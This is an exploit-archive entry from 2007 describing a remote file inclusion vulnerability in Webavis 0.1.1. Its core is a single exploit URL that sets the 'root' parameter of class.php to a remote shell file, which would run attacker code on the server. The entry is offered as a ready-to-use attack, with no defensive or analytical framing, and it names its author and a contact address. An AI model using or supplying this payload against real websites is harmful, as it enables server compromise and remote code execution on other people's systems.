Webavis 0.1.1 (class.php root) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Webavis 0.1.1 (class.php root) Remote File Inclusion Vulnerability
# Published : 2007-05-25
# Author : ThE TiGeR
# Previous Title : TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability
# Next Title : gCards <= 1.46 SQL Injection/Remote Code Execution Exploit

#Webavis Remote file inclusion (root)

#Download script : http://webavis.myreseau.org/src/webavis-0.1.1.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/webavis/class/class.php?root=shell.txt ?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

# www.Syue.com [2007-05-25]